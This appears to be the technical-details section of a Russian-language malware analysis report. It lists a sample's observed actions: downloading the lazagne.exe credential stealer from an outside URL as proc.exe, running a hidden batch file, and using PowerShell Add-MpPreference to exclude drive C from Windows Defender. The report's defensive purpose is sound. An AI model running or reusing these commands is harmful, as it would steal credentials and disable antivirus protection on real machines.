Техническая информация
- https://wxinmvl7x.i.ng/lazagne.exe as %appdata%\proc.exe
- %TEMP%\b412.tmp\b423.tmp\b424.bat
- nul
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\B412.tmp\B423.tmp\B424.bat <Полный путь к файлу>"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\B412.tmp\B423.tmp\B424.bat <Полный путь к файлу>"
- '<SYSTEM32>\net.exe' FILE
- '<SYSTEM32>\net1.exe' FILE
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:";
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Sleep -Seconds 30";